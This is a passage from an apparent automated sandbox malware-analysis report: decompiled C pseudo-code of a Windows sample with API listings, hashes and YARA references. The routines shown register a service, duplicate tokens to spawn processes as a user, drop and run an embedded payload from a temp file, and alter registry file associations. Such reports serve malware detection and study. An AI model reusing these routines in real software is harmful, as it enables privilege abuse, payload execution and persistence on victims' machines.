                                                                                          • Part of subcall function 00401A3A: wcslen.NTDLL ref: 00401A49
                                                                                        • wcscat.NTDLL ref: 00403A19
                                                                                        • wcslen.NTDLL ref: 00403A23
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlAllocateHeap.NTDLL(00000000,000016B9,0040D073), ref: 00403A64
                                                                                          • Part of subcall function 00401C9B: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,00000000,00000000,?,?,?), ref: 00401CC2
                                                                                          • Part of subcall function 00401C9B: WriteFile.KERNEL32(000000FF,00000000,00000000,00000000,00000000,?,?,?), ref: 00401CE0
                                                                                          • Part of subcall function 00401C9B: NtClose.NTDLL(000000FF), ref: 00401CF4
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?), ref: 00403A84
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403A93
                                                                                        • RegCreateKeyExW.ADVAPI32(80000000,00000000,00000000,00000000,00000000,00020106,00000000,?,00000000,?,?,00000000), ref: 00403AB4
                                                                                        • wcslen.NTDLL ref: 00403AC9
                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,00000002,00000000,?,?,?,00000000), ref: 00403AE9
                                                                                        • NtClose.NTDLL(?), ref: 00403AF2
                                                                                        • wcscpy.NTDLL ref: 00403B00
                                                                                        • wcscat.NTDLL ref: 00403B1A
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00403B2C
                                                                                        • RegCreateKeyExW.ADVAPI32(80000000,?,00000000,00000000,00000000,00020106,00000000,?,00000000), ref: 00403B4E
                                                                                        • wcslen.NTDLL ref: 00403B5F
                                                                                        • RegSetValueExW.ADVAPI32(?,00000000,00000000,00000001,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00403B82
                                                                                        • NtClose.NTDLL(?), ref: 00403B8B
                                                                                        • SHChangeNotify.SHELL32(08000000,00001000,00000000,00000000), ref: 00403B9F
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$wcslen$CloseCreateFree$AllocateFileValuewcscat$ChangeFolderNotifyPathSpecialWritewcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 169162344-0
                                                                                        • Opcode ID: 73cdadbb1b0d1af14fff2fbc0bb64ca04801c088b04f352c93fb03f4e09c407c
                                                                                        • Instruction ID: 86e6b5c3c9ce88e8f5e0538f26e879c48f5b416ba6627b11c980b9c66a79cee5
                                                                                        • Opcode Fuzzy Hash: 73cdadbb1b0d1af14fff2fbc0bb64ca04801c088b04f352c93fb03f4e09c407c
                                                                                        • Instruction Fuzzy Hash: 36516F71540208BFE7209FA0ED4AFAA7B7CFB44705F100075F605FA0A1D771AA19CB69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00407B27, Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 164memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 92%
                                                                                        			E00407B27(intOrPtr _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				long _v28;
				intOrPtr _v32;
				void* _v36;
				short _v556;
				void* _t51;
				char _t53;
				void* _t63;
				int _t66;
				int _t67;
				void* _t77;
				wchar_t* _t80;
				intOrPtr _t81;
				wchar_t** _t82;
				void* _t85;

				if( *0x40f5e6 == 0) {
					if( *0x40f5ea == 0) {
						_t51 = 0;
					} else {
						_t51 =  *0x40f5ea; // 0x0
					}
				} else {
					_t51 =  *0x40f5e6; // 0x0
				}
				_v12 = _t51;
				_t53 = GetModuleFileNameW(0,  &_v556, 0x104);
				if(_t53 == 0) {
					L28:
					return _t53;
				} else {
					_v32 = E00406BF9();
					_v8 = 0;
					_v28 = 0;
					_t81 = _a4;
					_t53 = E004072E0(_t81, 1,  &_v16, 0xffffffff,  &_v20,  &_v24,  &_v28, 0x64);
					if(_t53 != 0) {
						goto L28;
					}
					_t53 = RtlAllocateHeap( *0x40f5d6, 8, _v20 * 4);
					_v36 = _t53;
					if(_v36 != 0) {
						_t82 = _v16;
						do {
							if(_t82[1] == 0) {
								L15:
								if(E00407153(_v12, _t81,  *_t82) == 0) {
									goto L21;
								}
								_t19 = _t81 + 4; // 0x408cfc
								_t66 = wcslen(_t19);
								_t67 = wcslen( *_t82);
								_t85 = _t85 + 8;
								_t80 = RtlAllocateHeap( *0x40f5d6, 8, 0xc + (_t66 + _t67) * 2);
								if(_t80 == 0) {
									goto L21;
								}
								 *_t80 = 0x4e0055;
								_t80[1] = 0x5c0043;
								_t23 = _t81 + 4; // 0x408cfc
								wcscat(_t80, _t23);
								E00401A3A(_t80);
								wcscat(_t80,  *_t82);
								_t85 = _t85 + 0x10;
								E00406C06(_v12,  &_v556, _t80, _v8, _v36, 0);
								_v8 = _v8 + 1;
								if(_v8 != _v32) {
									goto L21;
								}
								_t77 = WaitForMultipleObjects(_v8, _v36, 1, 0xffffffff);
								_push(_t82);
								do {
									asm("lodsd");
									_t77 = NtClose(_t77);
									_v8 = _v8 - 1;
								} while (_v8 != 0);
								_pop(_t82);
								goto L21;
							}
							if(_t82[1] == 0x80000000 && E00407236( *_t82) == 0) {
								goto L15;
							}
							L21:
							_t82 =  &(_t82[3]);
							_v20 = _v20 - 1;
						} while (_v20 != 0);
						_t53 = RtlFreeHeap( *0x40f5d6, 0, _v16);
						L23:
						if(_v8 == 0) {
							L26:
							if(_v36 == 0) {
								goto L28;
							}
							return RtlFreeHeap( *0x40f5d6, 0, _v36);
						}
						_t63 = WaitForMultipleObjects(_v8, _v36, 1, 0xffffffff);
						do {
							asm("lodsd");
							_t63 = NtClose(_t63);
							_v8 = _v8 - 1;
						} while (_v8 != 0);
						goto L26;
					}
					goto L23;
				}
			}






















                                                                                        0x00407b3c
                                                                                        0x00407b4c
                                                                                        0x00407b55
                                                                                        0x00407b4e
                                                                                        0x00407b4e
                                                                                        0x00407b4e
                                                                                        0x00407b3e
                                                                                        0x00407b3e
                                                                                        0x00407b3e
                                                                                        0x00407b57
                                                                                        0x00407b68
                                                                                        0x00407b70
                                                                                        0x00407d29
                                                                                        0x00407d29
                                                                                        0x00407b76
                                                                                        0x00407b7b
                                                                                        0x00407b7e
                                                                                        0x00407b85
                                                                                        0x00407b8c
                                                                                        0x00407ba6
                                                                                        0x00407bad
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407bc6
                                                                                        0x00407bcc
                                                                                        0x00407bd3
                                                                                        0x00407bda
                                                                                        0x00407bdd
                                                                                        0x00407be1
                                                                                        0x00407bfe
                                                                                        0x00407c0b
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407c11
                                                                                        0x00407c15
                                                                                        0x00407c22
                                                                                        0x00407c28
                                                                                        0x00407c43
                                                                                        0x00407c47
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407c49
                                                                                        0x00407c4f
                                                                                        0x00407c56
                                                                                        0x00407c5b
                                                                                        0x00407c65
                                                                                        0x00407c6d
                                                                                        0x00407c73
                                                                                        0x00407c89
                                                                                        0x00407c8e
                                                                                        0x00407c97
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407ca3
                                                                                        0x00407ca9
                                                                                        0x00407cad
                                                                                        0x00407cad
                                                                                        0x00407caf
                                                                                        0x00407cb5
                                                                                        0x00407cb8
                                                                                        0x00407cbe
                                                                                        0x00000000
                                                                                        0x00407cbe
                                                                                        0x00407bea
                                                                                        0x00000000
                                                                                        0x00407bf7
                                                                                        0x00407cbf
                                                                                        0x00407cbf
                                                                                        0x00407cc2
                                                                                        0x00407cc5
                                                                                        0x00407cda
                                                                                        0x00407ce0
                                                                                        0x00407ce4
                                                                                        0x00407d0a
                                                                                        0x00407d0e
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x00407d1b
                                                                                        0x00407cf0
                                                                                        0x00407cf9
                                                                                        0x00407cf9
                                                                                        0x00407cfb
                                                                                        0x00407d01
                                                                                        0x00407d04
                                                                                        0x00000000
                                                                                        0x00407cf9
                                                                                        0x00000000
                                                                                        0x00407bd5

                                                                                        APIs
                                                                                        • GetModuleFileNameW.KERNEL32(00000000,?,00000104,?,?,?,?,00000000), ref: 00407B68
                                                                                        • RtlAllocateHeap.NTDLL(00000008,?,00408CF8), ref: 00407BC6
                                                                                        • wcslen.NTDLL ref: 00407C15
                                                                                        • wcslen.NTDLL ref: 00407C22
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00407C3D
                                                                                        • wcscat.NTDLL ref: 00407C5B
                                                                                        • wcscat.NTDLL ref: 00407C6D
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF,00408CF8,?,00000000,00000000,00000000,00000000), ref: 00407CA3
                                                                                        • NtClose.NTDLL(00000000), ref: 00407CAF
                                                                                        • RtlFreeHeap.NTDLL(00000000,?,00408CF8), ref: 00407CDA
                                                                                          • Part of subcall function 00407236: _wcsicmp.NTDLL ref: 0040727D
                                                                                        • WaitForMultipleObjects.KERNEL32(00000000,00000000,00000001,000000FF,?,?,?,?,00000000), ref: 00407CF0
                                                                                        • NtClose.NTDLL(00000000), ref: 00407CFB
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00407D1B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateCloseFreeMultipleObjectsWaitwcscatwcslen$FileModuleName_wcsicmp
                                                                                        • String ID: C
                                                                                        • API String ID: 2558984808-1037565863
                                                                                        • Opcode ID: db0690ae8750f9371b35c319286616e1a87cd1469a40b6f761cd6199e2282b1c
                                                                                        • Instruction ID: cef0aa228eca02f175d772fba0474a859ba3ed73c1a33fa541fa2c875ba2e559
                                                                                        • Opcode Fuzzy Hash: db0690ae8750f9371b35c319286616e1a87cd1469a40b6f761cd6199e2282b1c
                                                                                        • Instruction Fuzzy Hash: 9A515971908208FFEF209F90DD48BAEB7B9FB04305F10453AF511B22A0D779A959DB5A
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004027BC, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 134nativeregistryprocessCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 34%
                                                                                        			E004027BC() {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				int _v24;
				WCHAR* _v28;
				WCHAR* _v32;
				WCHAR* _v36;
				WCHAR* _v40;
				WCHAR* _v44;
				intOrPtr _v48;
				struct _SERVICE_STATUS _v52;
				struct _STARTUPINFOW _v124;
				struct _PROCESS_INFORMATION _v140;
				char* _v144;
				WCHAR* _v148;
				WCHAR* _v152;
				WCHAR* _v156;
				WCHAR* _v160;
				char _v164;
				char _v167;
				char _v168;
				intOrPtr _v172;
				char _v176;
				char _v208;
				intOrPtr* _t87;

				_v24 = RegisterServiceCtrlHandlerW( *0x40f95c, E004027B5);
				if(_v24 != 0) {
					_v52 = 0x110;
					_v48 = 4;
					_v44 = 0;
					_v40 = 0;
					_v36 = 0;
					_v32 = 0;
					_v28 = 0;
					if(SetServiceStatus(_v24,  &_v52) != 0) {
						_push( &_v8);
						_push(0x2000000);
						_push(0xffffffff);
						if( *0x40f6e4() == 0) {
							_v176 = 0xc;
							_v172 = 3;
							_v168 = 0;
							_v167 = 0;
							_v164 = 0x18;
							_v160 = 0;
							_v156 = 0;
							_v152 = 0;
							_v148 = 0;
							_v144 =  &_v176;
							_push( &_v12);
							_push(1);
							_push(0);
							_push( &_v164);
							_push(0x2000000);
							_push(_v8);
							if( *0x40f6b4() == 0) {
								_v16 = E00401C93();
								_push(4);
								_push( &_v16);
								_push(0xc);
								_push(_v12);
								if( *0x40f6d4() == 0) {
									E00401AE1(_v12);
									_push(1);
									_push(_v12);
									_push( &_v20);
									if( *0x40f938() != 0) {
										memset( &_v140, 0, 0x10);
										memset( &_v124, 0, 0x48);
										_v124.cb = 0x48;
										_t87 =  &_v208;
										 *_t87 = 0x690057;
										 *((intOrPtr*)(_t87 + 4)) = 0x53006e;
										 *((intOrPtr*)(_t87 + 8)) = 0x610074;
										 *((intOrPtr*)(_t87 + 0xc)) = 0x5c0030;
										 *((intOrPtr*)(_t87 + 0x10)) = 0x650044;
										 *((intOrPtr*)(_t87 + 0x14)) = 0x610066;
										 *((intOrPtr*)(_t87 + 0x18)) = 0x6c0075;
										 *((intOrPtr*)(_t87 + 0x1c)) = 0x74;
										_v124.lpDesktop = _t87;
										if(CreateProcessAsUserW(_v12, 0,  *0x40f5e2, 0, 0, 0, 0x80430, _v20, 0,  &_v124,  &_v140) != 0) {
											NtClose(_v140);
											NtClose(_v140.hThread);
										}
										 *0x40f93c(_v20);
									}
								}
								NtClose(_v12);
							}
							NtClose(_v8);
						}
						_v52 = 0x110;
						_v48 = 1;
						_v44 = 0;
						_v40 = 0;
						_v36 = 0;
						_v32 = 0;
						_v28 = 0;
						SetServiceStatus(_v24,  &_v52);
					}
				}
				return 0;
			}





























                                                                                        0x004027d6
                                                                                        0x004027dd
                                                                                        0x004027e3
                                                                                        0x004027ea
                                                                                        0x004027f1
                                                                                        0x004027f8
                                                                                        0x004027ff
                                                                                        0x00402806
                                                                                        0x0040280d
                                                                                        0x00402823
                                                                                        0x0040282c
                                                                                        0x0040282d
                                                                                        0x00402832
                                                                                        0x0040283c
                                                                                        0x00402842
                                                                                        0x0040284c
                                                                                        0x00402856
                                                                                        0x0040285d
                                                                                        0x00402864
                                                                                        0x0040286e
                                                                                        0x00402878
                                                                                        0x00402882
                                                                                        0x0040288c
                                                                                        0x0040289c
                                                                                        0x004028a5
                                                                                        0x004028a6
                                                                                        0x004028a8
                                                                                        0x004028b0
                                                                                        0x004028b1
                                                                                        0x004028b6
                                                                                        0x004028c1
                                                                                        0x004028cc
                                                                                        0x004028cf
                                                                                        0x004028d4
                                                                                        0x004028d5
                                                                                        0x004028d7
                                                                                        0x004028e2
                                                                                        0x004028eb
                                                                                        0x004028f0
                                                                                        0x004028f2
                                                                                        0x004028f8
                                                                                        0x00402901
                                                                                        0x00402912
                                                                                        0x00402923
                                                                                        0x0040292c
                                                                                        0x00402933
                                                                                        0x00402939
                                                                                        0x0040293f
                                                                                        0x00402946
                                                                                        0x0040294d
                                                                                        0x00402954
                                                                                        0x0040295b
                                                                                        0x00402962
                                                                                        0x00402969
                                                                                        0x00402970
                                                                                        0x004029a1
                                                                                        0x004029a9
                                                                                        0x004029b5
                                                                                        0x004029b5
                                                                                        0x004029be
                                                                                        0x004029be
                                                                                        0x00402901
                                                                                        0x004029c7
                                                                                        0x004029c7
                                                                                        0x004029d0
                                                                                        0x004029d0
                                                                                        0x004029d6
                                                                                        0x004029dd
                                                                                        0x004029e4
                                                                                        0x004029eb
                                                                                        0x004029f2
                                                                                        0x004029f9
                                                                                        0x00402a00
                                                                                        0x00402a0e
                                                                                        0x00402a0e
                                                                                        0x00402823
                                                                                        0x00402a1c

                                                                                        APIs
                                                                                        • RegisterServiceCtrlHandlerW.ADVAPI32(Function_000027B5), ref: 004027D0
                                                                                        • SetServiceStatus.ADVAPI32(00000000,00000110), ref: 0040281B
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,02000000,?), ref: 00402834
                                                                                        • NtDuplicateToken.NTDLL(?,02000000,00000018,00000000,00000001,?), ref: 004028B9
                                                                                        • NtSetInformationToken.NTDLL(?,0000000C,?,00000004), ref: 004028DA
                                                                                        • NtClose.NTDLL(?), ref: 004029C7
                                                                                          • Part of subcall function 00401AE1: NtDuplicateToken.NTDLL(q@,0000000C,?,00000000,00000002,00000000), ref: 00401B2B
                                                                                          • Part of subcall function 00401AE1: NtSetInformationThread.NTDLL(000000FE,00000005,005C003F,00000004), ref: 00401B3F
                                                                                          • Part of subcall function 00401AE1: NtClose.NTDLL(005C003F), ref: 00401B4D
                                                                                        • memset.NTDLL ref: 00402912
                                                                                        • memset.NTDLL ref: 00402923
                                                                                        • CreateProcessAsUserW.ADVAPI32(?,00000000,00000000,00000000,00000000,00080430,?,00000000,00000048,?), ref: 00402999
                                                                                        • NtClose.NTDLL(?), ref: 004029A9
                                                                                        • NtClose.NTDLL(?), ref: 004029B5
                                                                                        • NtClose.NTDLL(?), ref: 004029D0
                                                                                        • SetServiceStatus.ADVAPI32(00000000,00000110), ref: 00402A0E
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Close$Token$Service$DuplicateInformationProcessStatusmemset$CreateCtrlHandlerOpenRegisterThreadUser
                                                                                        • String ID: H
                                                                                        • API String ID: 1514161951-2852464175
                                                                                        • Opcode ID: 972512c50c8dde4b418ff70452bfcfc6d45830bb5e09b680e711a062b3575c0b
                                                                                        • Instruction ID: 6d24dedfd07dbbf4ac9121751a7b96aa0af6ce2b37ab588081401d70967f2461
                                                                                        • Opcode Fuzzy Hash: 972512c50c8dde4b418ff70452bfcfc6d45830bb5e09b680e711a062b3575c0b
                                                                                        • Instruction Fuzzy Hash: 6151BAB1900218EFEB219F90DD49BDEBBB8FB04704F1441B9E504BA1A1D7B64A88DF65
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040456A, Relevance: 22.8, APIs: 12, Strings: 1, Instructions: 96memoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 91%
                                                                                        			E0040456A() {
				void* _v8;
				void* _v12;
				struct _STARTUPINFOW _v84;
				struct _PROCESS_INFORMATION _v100;
				short _v620;
				short _v1140;
				char _t36;

				_v12 = 0;
				 *0x40f8b8(0,  &_v620, 0x23, 0);
				GetTempFileNameW( &_v620, 0, 0,  &_v1140);
				_v8 = E00401D08(0x40e8d6);
				if(_v8 != 0) {
					_v12 = RtlAllocateHeap( *0x40f5d6, 0, 0x12e8);
					if(_v12 != 0) {
						_t36 = E00401C9B( &_v1140, _v12, E0040A135(_v8, _v12));
						if(_t36 != 0) {
							memset( &_v100, 0, 0x10);
							memset( &_v84, 0, 0x48);
							_v84.cb = 0x48;
							if(CreateProcessW(0,  &_v1140, 0, 0, 1, 0x8080000, 0, 0,  &_v84,  &_v100) != 0) {
								WaitForSingleObject(_v100.hProcess, 0xffffffff);
								NtClose(_v100);
								NtClose(_v100.hThread);
							}
							_t36 = DeleteFileW( &_v1140);
						}
					}
				}
				if(_v8 != 0) {
					_t36 = RtlFreeHeap( *0x40f5d6, 0, _v8);
				}
				if(_v12 == 0) {
					return _t36;
				} else {
					return RtlFreeHeap( *0x40f5d6, 0, _v12);
				}
			}










                                                                                        0x00404573
                                                                                        0x00404587
                                                                                        0x0040459f
                                                                                        0x004045af
                                                                                        0x004045b6
                                                                                        0x004045d0
                                                                                        0x004045d7
                                                                                        0x004045f4
                                                                                        0x004045fb
                                                                                        0x0040460a
                                                                                        0x0040461b
                                                                                        0x00404624
                                                                                        0x00404653
                                                                                        0x0040465a
                                                                                        0x00404663
                                                                                        0x0040466c
                                                                                        0x0040466c
                                                                                        0x00404679
                                                                                        0x00404679
                                                                                        0x004045fb
                                                                                        0x004045d7
                                                                                        0x00404683
                                                                                        0x00404690
                                                                                        0x00404690
                                                                                        0x0040469a
                                                                                        0x004046b0
                                                                                        0x0040469c
                                                                                        0x00000000
                                                                                        0x004046a7

                                                                                        APIs
                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000023,00000000), ref: 00404587
                                                                                        • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 0040459F
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RtlAllocateHeap.NTDLL(00000000,000012E8,0040E8D6), ref: 004045CA
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00404690
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004046A7
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$AllocateFree$FileFolderNamePathSpecialTemp
                                                                                        • String ID: H
                                                                                        • API String ID: 133574123-2852464175
                                                                                        • Opcode ID: a4064c55c635eb432e4438e95acb91c8d0baf7c06494d896e2fcdfc13b83f250
                                                                                        • Instruction ID: 91642b39a8523c4b0a1516c9930b3f7f497f1802c9500f2bea9157717e4d2dfe
                                                                                        • Opcode Fuzzy Hash: a4064c55c635eb432e4438e95acb91c8d0baf7c06494d896e2fcdfc13b83f250
                                                                                        • Instruction Fuzzy Hash: 1E3118B1944208FBEB209FA0DD0AFAD7B79BB04705F100475F204BA4E0D7BA5A599B1D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 0040625C, Relevance: 18.1, APIs: 12, Instructions: 120memorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040625C(long _a4, intOrPtr _a8, wchar_t* _a12, wchar_t* _a16) {
				long _v8;
				void* _v12;
				long _v16;
				void* _v20;
				void* _v24;
				intOrPtr _t42;
				int _t44;
				int _t45;
				int _t51;
				int _t55;
				intOrPtr _t65;

				_v8 = 0;
				_t42 =  *0x40f5f2; // 0xa6e
				_t65 =  *0x40f5f6; // 0x0
				if(_t65 != _a8 || _t42 != _a4) {
					L21:
					return _v8;
				} else {
					_t44 = wcslen(_a12);
					_t45 = wcslen(_a16);
					_v20 = 0;
					_v24 = 0;
					_v20 = RtlAllocateHeap( *0x40f5d6, 8, 4 + (_t44 + _t45) * 2);
					if(_v20 != 0) {
						wcscpy(_v20, _a16);
						E00401A3A(_v20);
						wcscat(_v20, _a12);
						_t51 = SetFileAttributesW(_v20, 0x80);
						__eflags = _t51;
						if(_t51 != 0) {
							_v12 = CreateFileW(_v20, 0x80000000, 0, 0, 3, 0x80, 0);
							__eflags = _v12 - 0xffffffff;
							if(_v12 != 0xffffffff) {
								_v24 = RtlAllocateHeap( *0x40f5d6, 0, _a4);
								__eflags = _v24;
								if(_v24 != 0) {
									_t55 = ReadFile(_v12, _v24, _a4,  &_v16, 0);
									__eflags = _t55;
									if(_t55 != 0) {
										__eflags = _v16;
										if(_v16 != 0) {
											__eflags = E00401000(_v24, _v16, 0xffffffff) -  *0x40f5ee; // 0x1ba45e81
											if(__eflags == 0) {
												_v8 = 1;
											}
										}
									} else {
										_v8 =  *[fs:0x34];
									}
								}
							} else {
								_v8 =  *[fs:0x34];
							}
						} else {
							_v8 =  *[fs:0x34];
						}
					}
					if(_v12 != 0xffffffff) {
						NtClose(_v12);
					}
					if(_v20 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v20);
					}
					if(_v24 != 0) {
						RtlFreeHeap( *0x40f5d6, 0, _v24);
					}
					goto L21;
				}
			}














                                                                                        0x00406267
                                                                                        0x0040626e
                                                                                        0x00406273
                                                                                        0x0040627c
                                                                                        0x004063ed
                                                                                        0x004063f8
                                                                                        0x0040628b
                                                                                        0x0040628e
                                                                                        0x0040629c
                                                                                        0x004062a7
                                                                                        0x004062ae
                                                                                        0x004062cb
                                                                                        0x004062d2
                                                                                        0x004062df
                                                                                        0x004062eb
                                                                                        0x004062f6
                                                                                        0x00406307
                                                                                        0x0040630d
                                                                                        0x0040630f
                                                                                        0x0040633a
                                                                                        0x0040633d
                                                                                        0x00406341
                                                                                        0x0040635f
                                                                                        0x00406362
                                                                                        0x00406366
                                                                                        0x00406379
                                                                                        0x0040637f
                                                                                        0x00406381
                                                                                        0x0040638e
                                                                                        0x00406392
                                                                                        0x004063a1
                                                                                        0x004063a7
                                                                                        0x004063a9
                                                                                        0x004063a9
                                                                                        0x004063a7
                                                                                        0x00406383
                                                                                        0x00406389
                                                                                        0x00406389
                                                                                        0x00406381
                                                                                        0x00406343
                                                                                        0x00406349
                                                                                        0x00406349
                                                                                        0x00406311
                                                                                        0x00406317
                                                                                        0x00406317
                                                                                        0x0040630f
                                                                                        0x004063b4
                                                                                        0x004063b9
                                                                                        0x004063b9
                                                                                        0x004063c3
                                                                                        0x004063d0
                                                                                        0x004063d0
                                                                                        0x004063da
                                                                                        0x004063e7
                                                                                        0x004063e7
                                                                                        0x00000000
                                                                                        0x004063da

                                                                                        APIs
                                                                                        • wcslen.NTDLL ref: 0040628E
                                                                                        • wcslen.NTDLL ref: 0040629C
                                                                                        • RtlAllocateHeap.NTDLL(00000008,00000000), ref: 004062C5
                                                                                        • wcscpy.NTDLL ref: 004062DF
                                                                                        • wcscat.NTDLL ref: 004062F6
                                                                                        • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00406307
                                                                                        • NtClose.NTDLL(000000FF), ref: 004063B9
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004063D0
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 004063E7
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Freewcslen$AllocateAttributesCloseFilewcscatwcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 3518810966-0
                                                                                        • Opcode ID: 226d2c4afde3b8cec54bcca8d3aa33ed170b619abfefe8aae8ad66cb1f1846a0
                                                                                        • Instruction ID: 2eaa4e9fd8f092476644c0bf5c432b4a8346afcc2a07f9544f0d098c890c2e43
                                                                                        • Opcode Fuzzy Hash: 226d2c4afde3b8cec54bcca8d3aa33ed170b619abfefe8aae8ad66cb1f1846a0
                                                                                        • Instruction Fuzzy Hash: B8414830900209EFDB219F90DE49BAE7B75FB04311F104535F912B26F0C7756A68DB99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402367, Relevance: 18.1, APIs: 12, Instructions: 97memorynativelibraryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 67%
                                                                                        			E00402367() {
				long _v8;
				void* _t12;
				void* _t29;
				intOrPtr _t30;
				void* _t33;
				wchar_t* _t36;
				intOrPtr _t37;

				_v8 = 0x1000;
				_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f958, 0,  &_v8, 0x3000, 4);
				if( *0x40f958 != 0) {
					_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f954, 0,  &_v8, 0x3000, 4);
					if( *0x40f954 != 0) {
						_t12 = NtAllocateVirtualMemory(0xffffffff, 0x40f950, 0,  &_v8, 0x3000, 4);
						if( *0x40f950 != 0) {
							E00401A95(_t12,  *0x40f950);
							E00401A3A( *0x40f950);
							_t12 = E00401D08(0x40cf2b);
							_t29 = _t12;
							if(_t29 != 0) {
								wcscpy( *0x40f958, _t29);
								wcscat( *0x40f950, _t29);
								_t36 =  *0x40f950; // 0x0
								_t33 =  *0x40f954; // 0x0
								asm("stosw");
								memcpy(_t33, _t36, wcslen(_t36) << 1);
								asm("stosw");
								RtlFreeHeap( *0x40f5d6, 0, _t29);
